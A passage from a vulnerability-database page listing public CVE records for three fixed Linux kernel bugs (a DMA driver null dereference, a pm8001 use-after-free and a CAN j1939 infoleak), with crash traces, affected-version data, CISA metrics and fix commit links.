[ 67.848525] x15: 0000000000000000 x14: 0000000000000000
[ 67.848529] x13: 0000000000000000 x12: 0000000000000040
[ 67.848533] x11: ffff0800c0400248 x10: ffff0800c040024a
[ 67.848538] x9 : ffff800010576cd4 x8 : ffff0800c0400270
[ 67.848542] x7 : 0000000000000000 x6 : ffff0800c04003e0
[ 67.848546] x5 : ffff0800c0400248 x4 : ffff0800c4294480
[ 67.848550] x3 : dead000000000100 x2 : dead000000000122
[ 67.848555] x1 : 0000000000000100 x0 : ffff0800c097c168
[ 67.848559] Call trace:
[ 67.848562] axi_chan_handle_err+0xc4/0x230
[ 67.848566] dw_axi_dma_interrupt+0xf4/0x590
[ 67.848569] __handle_irq_event_percpu+0x60/0x220
[ 67.848573] handle_irq_event+0x64/0x120
[ 67.848576] handle_fasteoi_irq+0xc4/0x220
[ 67.848580] __handle_domain_irq+0x80/0xe0
[ 67.848583] gic_handle_irq+0xc0/0x138
[ 67.848585] el1_irq+0xc8/0x180
[ 67.848588] arch_cpu_idle+0x14/0x2c
[ 67.848591] default_idle_call+0x40/0x16c
[ 67.848594] do_idle+0x1f0/0x250
[ 67.848597] cpu_startup_entry+0x2c/0x60
[ 67.848600] rest_init+0xc0/0xcc
[ 67.848603] arch_call_rest_init+0x14/0x1c
[ 67.848606] start_kernel+0x4cc/0x500
[ 67.848610] Code: eb0002ff 9a9f12d6 f2fbd5a2 f2fbd5a3 (a94602c1)
[ 67.848613] ---[ end trace 585a97036f88203a ]---
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1fe20f1b84548bbcf48b6659ea171cd46618ea3a Version: 1fe20f1b84548bbcf48b6659ea171cd46618ea3a Version: 1fe20f1b84548bbcf48b6659ea171cd46618ea3a Version: 1fe20f1b84548bbcf48b6659ea171cd46618ea3a Version: 1fe20f1b84548bbcf48b6659ea171cd46618ea3a Version: 1fe20f1b84548bbcf48b6659ea171cd46618ea3a |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52899",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:03:34.135190Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:16.116Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f534dc438828cc3f1f8c6895b8bdfbef079521fb",
"status": "affected",
"version": "1fe20f1b84548bbcf48b6659ea171cd46618ea3a",
"versionType": "git"
},
{
"lessThan": "53dd833fd0a2d8f0118d01ea063a70652689d31e",
"status": "affected",
"version": "1fe20f1b84548bbcf48b6659ea171cd46618ea3a",
"versionType": "git"
},
{
"lessThan": "20d0a6d17e85a8a816a64fa7d7cae616f1617833",
"status": "affected",
"version": "1fe20f1b84548bbcf48b6659ea171cd46618ea3a",
"versionType": "git"
},
{
"lessThan": "5054d001ffaf76155637c5e5b922c11016cd6a5d",
"status": "affected",
"version": "1fe20f1b84548bbcf48b6659ea171cd46618ea3a",
"versionType": "git"
},
{
"lessThan": "51a7ad5b60efac65691729d10745c28fa1016b96",
"status": "affected",
"version": "1fe20f1b84548bbcf48b6659ea171cd46618ea3a",
"versionType": "git"
},
{
"lessThan": "57054fe516d59d03a7bcf1888e82479ccc244f87",
"status": "affected",
"version": "1fe20f1b84548bbcf48b6659ea171cd46618ea3a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/dma/dw-axi-dmac/dw-axi-dmac-platform.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.17"
},
{
"lessThan": "4.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.230",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.271",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.230",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.165",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.90",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.8",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "4.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nAdd exception protection processing for vd in axi_chan_handle_err function\n\nSince there is no protection for vd, a kernel panic will be\ntriggered here in exceptional cases.\n\nYou can refer to the processing of axi_chan_block_xfer_complete function\n\nThe triggered kernel panic is as follows:\n\n[ 67.848444] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000060\n[ 67.848447] Mem abort info:\n[ 67.848449] ESR = 0x96000004\n[ 67.848451] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 67.848454] SET = 0, FnV = 0\n[ 67.848456] EA = 0, S1PTW = 0\n[ 67.848458] Data abort info:\n[ 67.848460] ISV = 0, ISS = 0x00000004\n[ 67.848462] CM = 0, WnR = 0\n[ 67.848465] user pgtable: 4k pages, 48-bit VAs, pgdp=00000800c4c0b000\n[ 67.848468] [0000000000000060] pgd=0000000000000000, p4d=0000000000000000\n[ 67.848472] Internal error: Oops: 96000004 [#1] SMP\n[ 67.848475] Modules linked in: dmatest\n[ 67.848479] CPU: 0 PID: 0 Comm: swapper/0 Not tainted 5.10.100-emu_x2rc+ #11\n[ 67.848483] pstate: 62000085 (nZCv daIf -PAN -UAO +TCO BTYPE=--)\n[ 67.848487] pc : axi_chan_handle_err+0xc4/0x230\n[ 67.848491] lr : axi_chan_handle_err+0x30/0x230\n[ 67.848493] sp : ffff0803fe55ae50\n[ 67.848495] x29: ffff0803fe55ae50 x28: ffff800011212200\n[ 67.848500] x27: ffff0800c42c0080 x26: ffff0800c097c080\n[ 67.848504] x25: ffff800010d33880 x24: ffff80001139d850\n[ 67.848508] x23: ffff0800c097c168 x22: 0000000000000000\n[ 67.848512] x21: 0000000000000080 x20: 0000000000002000\n[ 67.848517] x19: ffff0800c097c080 x18: 0000000000000000\n[ 67.848521] x17: 0000000000000000 x16: 0000000000000000\n[ 67.848525] x15: 0000000000000000 x14: 0000000000000000\n[ 67.848529] x13: 0000000000000000 x12: 0000000000000040\n[ 67.848533] x11: ffff0800c0400248 x10: ffff0800c040024a\n[ 67.848538] x9 : ffff800010576cd4 x8 : ffff0800c0400270\n[ 67.848542] x7 : 0000000000000000 x6 : ffff0800c04003e0\n[ 67.848546] x5 : ffff0800c0400248 x4 : ffff0800c4294480\n[ 67.848550] x3 : dead000000000100 x2 : dead000000000122\n[ 67.848555] x1 : 0000000000000100 x0 : ffff0800c097c168\n[ 67.848559] Call trace:\n[ 67.848562] axi_chan_handle_err+0xc4/0x230\n[ 67.848566] dw_axi_dma_interrupt+0xf4/0x590\n[ 67.848569] __handle_irq_event_percpu+0x60/0x220\n[ 67.848573] handle_irq_event+0x64/0x120\n[ 67.848576] handle_fasteoi_irq+0xc4/0x220\n[ 67.848580] __handle_domain_irq+0x80/0xe0\n[ 67.848583] gic_handle_irq+0xc0/0x138\n[ 67.848585] el1_irq+0xc8/0x180\n[ 67.848588] arch_cpu_idle+0x14/0x2c\n[ 67.848591] default_idle_call+0x40/0x16c\n[ 67.848594] do_idle+0x1f0/0x250\n[ 67.848597] cpu_startup_entry+0x2c/0x60\n[ 67.848600] rest_init+0xc0/0xcc\n[ 67.848603] arch_call_rest_init+0x14/0x1c\n[ 67.848606] start_kernel+0x4cc/0x500\n[ 67.848610] Code: eb0002ff 9a9f12d6 f2fbd5a2 f2fbd5a3 (a94602c1)\n[ 67.848613] ---[ end trace 585a97036f88203a ]---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T08:50:01.288Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f534dc438828cc3f1f8c6895b8bdfbef079521fb"
},
{
"url": "https://git.kernel.org/stable/c/53dd833fd0a2d8f0118d01ea063a70652689d31e"
},
{
"url": "https://git.kernel.org/stable/c/20d0a6d17e85a8a816a64fa7d7cae616f1617833"
},
{
"url": "https://git.kernel.org/stable/c/5054d001ffaf76155637c5e5b922c11016cd6a5d"
},
{
"url": "https://git.kernel.org/stable/c/51a7ad5b60efac65691729d10745c28fa1016b96"
},
{
"url": "https://git.kernel.org/stable/c/57054fe516d59d03a7bcf1888e82479ccc244f87"
}
],
"title": "Add exception protection processing for vd in axi_chan_handle_err function",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52899",
"datePublished": "2024-08-21T06:10:39.438Z",
"dateReserved": "2024-08-21T06:07:11.014Z",
"dateUpdated": "2025-05-21T08:50:01.288Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48791 (GCVE-0-2022-48791)
Vulnerability from cvelistv5
Published
2024-07-16 11:43
Modified
2025-05-04 08:23
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: pm8001: Fix use-after-free for aborted TMF sas_task
Currently a use-after-free may occur if a TMF sas_task is aborted before we
handle the IO completion in mpi_ssp_completion(). The abort occurs due to
timeout.
When the timeout occurs, the SAS_TASK_STATE_ABORTED flag is set and the
sas_task is freed in pm8001_exec_internal_tmf_task().
However, if the I/O completion occurs later, the I/O completion still
thinks that the sas_task is available. Fix this by clearing the ccb->task
if the TMF times out - the I/O completion handler does nothing if this
pointer is cleared.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T15:25:00.417Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d872e7b5fe38f325f5206b6872746fa02c2b4819"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3c334cdfd94945b8edb94022a0371a8665b17366"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/510b21442c3a2e3ecc071ba3e666b320e7acdd61"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/61f162aa4381845acbdc7f2be4dfb694d027c018"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48791",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:59:35.678672Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:15.736Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/pm8001/pm8001_sas.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d872e7b5fe38f325f5206b6872746fa02c2b4819",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3c334cdfd94945b8edb94022a0371a8665b17366",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "510b21442c3a2e3ecc071ba3e666b320e7acdd61",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "61f162aa4381845acbdc7f2be4dfb694d027c018",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/pm8001/pm8001_sas.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.102",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.25",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.102",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.25",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: pm8001: Fix use-after-free for aborted TMF sas_task\n\nCurrently a use-after-free may occur if a TMF sas_task is aborted before we\nhandle the IO completion in mpi_ssp_completion(). The abort occurs due to\ntimeout.\n\nWhen the timeout occurs, the SAS_TASK_STATE_ABORTED flag is set and the\nsas_task is freed in pm8001_exec_internal_tmf_task().\n\nHowever, if the I/O completion occurs later, the I/O completion still\nthinks that the sas_task is available. Fix this by clearing the ccb-\u003etask\nif the TMF times out - the I/O completion handler does nothing if this\npointer is cleared."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:23:12.651Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d872e7b5fe38f325f5206b6872746fa02c2b4819"
},
{
"url": "https://git.kernel.org/stable/c/3c334cdfd94945b8edb94022a0371a8665b17366"
},
{
"url": "https://git.kernel.org/stable/c/510b21442c3a2e3ecc071ba3e666b320e7acdd61"
},
{
"url": "https://git.kernel.org/stable/c/61f162aa4381845acbdc7f2be4dfb694d027c018"
}
],
"title": "scsi: pm8001: Fix use-after-free for aborted TMF sas_task",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48791",
"datePublished": "2024-07-16T11:43:47.211Z",
"dateReserved": "2024-07-16T11:38:08.893Z",
"dateUpdated": "2025-05-04T08:23:12.651Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42076 (GCVE-0-2024-42076)
Vulnerability from cvelistv5
Published
2024-07-29 15:52
Modified
2025-05-04 09:22
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: can: j1939: Initialize unused data in j1939_send_one()
syzbot reported kernel-infoleak in raw_recvmsg() [1]. j1939_send_one()
creates full frame including unused data, but it doesn't initialize
it. This causes the kernel-infoleak issue. Fix this by initializing
unused data.
[1]
BUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline]
BUG: KMSAN: kernel-infoleak in copy_to_user_iter lib/iov_iter.c:24 [inline]
BUG: KMSAN: kernel-infoleak in iterate_ubuf include/linux/iov_iter.h:29 [inline]
BUG: KMSAN: kernel-infoleak in iterate_and_advance2 include/linux/iov_iter.h:245 [inline]
BUG: KMSAN: kernel-infoleak in iterate_and_advance include/linux/iov_iter.h:271 [inline]
BUG: KMSAN: kernel-infoleak in _copy_to_iter+0x366/0x2520 lib/iov_iter.c:185
instrument_copy_to_user include/linux/instrumented.h:114 [inline]
copy_to_user_iter lib/iov_iter.c:24 [inline]
iterate_ubuf include/linux/iov_iter.h:29 [inline]
iterate_and_advance2 include/linux/iov_iter.h:245 [inline]
iterate_and_advance include/linux/iov_iter.h:271 [inline]
_copy_to_iter+0x366/0x2520 lib/iov_iter.c:185
copy_to_iter include/linux/uio.h:196 [inline]
memcpy_to_msg include/linux/skbuff.h:4113 [inline]
raw_recvmsg+0x2b8/0x9e0 net/can/raw.c:1008
sock_recvmsg_nosec net/socket.c:1046 [inline]
sock_recvmsg+0x2c4/0x340 net/socket.c:1068
____sys_recvmsg+0x18a/0x620 net/socket.c:2803
___sys_recvmsg+0x223/0x840 net/socket.c:2845
do_recvmmsg+0x4fc/0xfd0 net/socket.c:2939
__sys_recvmmsg net/socket.c:3018 [inline]
__do_sys_recvmmsg net/socket.c:3041 [inline]
__se_sys_recvmmsg net/socket.c:3034 [inline]
__x64_sys_recvmmsg+0x397/0x490 net/socket.c:3034
x64_sys_call+0xf6c/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:300
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x77/0x7f
Uninit was created at:
slab_post_alloc_hook mm/slub.c:3804 [inline]
slab_alloc_node mm/slub.c:3845 [inline]
kmem_cache_alloc_node+0x613/0xc50 mm/slub.c:3888
kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:577
__alloc_skb+0x35b/0x7a0 net/core/skbuff.c:668
alloc_skb include/linux/skbuff.h:1313 [inline]
alloc_skb_with_frags+0xc8/0xbf0 net/core/skbuff.c:6504
sock_alloc_send_pskb+0xa81/0xbf0 net/core/sock.c:2795
sock_alloc_send_skb include/net/sock.h:1842 [inline]
j1939_sk_alloc_skb net/can/j1939/socket.c:878 [inline]
j1939_sk_send_loop net/can/j1939/socket.c:1142 [inline]
j1939_sk_sendmsg+0xc0a/0x2730 net/can/j1939/socket.c:1277
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg+0x30f/0x380 net/socket.c:745
____sys_sendmsg+0x877/0xb60 net/socket.c:2584
___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638
__sys_sendmsg net/socket.c:2667 [inline]
__do_sys_sendmsg net/socket.c:2676 [inline]
__se_sys_sendmsg net/socket.c:2674 [inline]
__x64_sys_sendmsg+0x307/0x4a0 net/socket.c:2674
x64_sys_call+0xc4b/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:47
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x77/0x7f
Bytes 12-15 of 16 are uninitialized
Memory access of size 16 starts at ffff888120969690
Data copied to user address 00000000200017c0
CPU: 1 PID: 5050 Comm: syz-executor198 Not tainted 6.9.0-rc5-syzkaller-00031-g71b1543c83d6 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c Version: 9d71dd0c70099914fcd063135da3c580865e924c |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:31.919Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5e4ed38eb17eaca42de57d500cc0f9668d2b6abf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a2a0ebff7fdeb2f66e29335adf64b9e457300dd4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4c5dc3927e17489c1cae6f48c0d5e4acb4cae01f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f97cbce633923588307049c4aef9feb2987e371b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ab2a683938ba4416d389c2f5651cbbb2c41b779f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ba7e5ae8208ac07d8e1eace0951a34c169a2d298"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b7cdf1dd5d2a2d8200efd98d1893684db48fe134"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42076",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:19:26.772684Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:57.462Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/can/j1939/main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5e4ed38eb17eaca42de57d500cc0f9668d2b6abf",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "a2a0ebff7fdeb2f66e29335adf64b9e457300dd4",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "4c5dc3927e17489c1cae6f48c0d5e4acb4cae01f",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "f97cbce633923588307049c4aef9feb2987e371b",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "ab2a683938ba4416d389c2f5651cbbb2c41b779f",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "ba7e5ae8208ac07d8e1eace0951a34c169a2d298",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
},
{
"lessThan": "b7cdf1dd5d2a2d8200efd98d1893684db48fe134",
"status": "affected",
"version": "9d71dd0c70099914fcd063135da3c580865e924c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/can/j1939/main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.4"
},
{
"lessThan": "5.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.279",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.279",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "5.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: can: j1939: Initialize unused data in j1939_send_one()\n\nsyzbot reported kernel-infoleak in raw_recvmsg() [1]. j1939_send_one()\ncreates full frame including unused data, but it doesn\u0027t initialize\nit. This causes the kernel-infoleak issue. Fix this by initializing\nunused data.\n\n[1]\nBUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline]\nBUG: KMSAN: kernel-infoleak in copy_to_user_iter lib/iov_iter.c:24 [inline]\nBUG: KMSAN: kernel-infoleak in iterate_ubuf include/linux/iov_iter.h:29 [inline]\nBUG: KMSAN: kernel-infoleak in iterate_and_advance2 include/linux/iov_iter.h:245 [inline]\nBUG: KMSAN: kernel-infoleak in iterate_and_advance include/linux/iov_iter.h:271 [inline]\nBUG: KMSAN: kernel-infoleak in _copy_to_iter+0x366/0x2520 lib/iov_iter.c:185\n instrument_copy_to_user include/linux/instrumented.h:114 [inline]\n copy_to_user_iter lib/iov_iter.c:24 [inline]\n iterate_ubuf include/linux/iov_iter.h:29 [inline]\n iterate_and_advance2 include/linux/iov_iter.h:245 [inline]\n iterate_and_advance include/linux/iov_iter.h:271 [inline]\n _copy_to_iter+0x366/0x2520 lib/iov_iter.c:185\n copy_to_iter include/linux/uio.h:196 [inline]\n memcpy_to_msg include/linux/skbuff.h:4113 [inline]\n raw_recvmsg+0x2b8/0x9e0 net/can/raw.c:1008\n sock_recvmsg_nosec net/socket.c:1046 [inline]\n sock_recvmsg+0x2c4/0x340 net/socket.c:1068\n ____sys_recvmsg+0x18a/0x620 net/socket.c:2803\n ___sys_recvmsg+0x223/0x840 net/socket.c:2845\n do_recvmmsg+0x4fc/0xfd0 net/socket.c:2939\n __sys_recvmmsg net/socket.c:3018 [inline]\n __do_sys_recvmmsg net/socket.c:3041 [inline]\n __se_sys_recvmmsg net/socket.c:3034 [inline]\n __x64_sys_recvmmsg+0x397/0x490 net/socket.c:3034\n x64_sys_call+0xf6c/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:300\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n 